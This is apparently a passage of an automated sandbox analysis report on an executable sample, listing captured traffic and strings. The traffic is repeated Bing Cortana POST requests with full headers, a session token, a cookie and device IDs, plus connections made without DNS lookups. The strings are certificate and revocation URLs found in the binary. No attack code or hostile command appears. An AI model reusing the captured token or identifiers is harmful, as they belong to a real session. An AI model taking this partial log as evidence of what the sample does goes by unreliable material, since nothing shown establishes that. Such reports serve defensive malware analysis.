t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89890Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 85516Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 86221Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 75003Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl
                        Source: 98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-aia.ws.symantec.com/evcs.cer0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-crl.ws.symantec.com/evcs.crl0
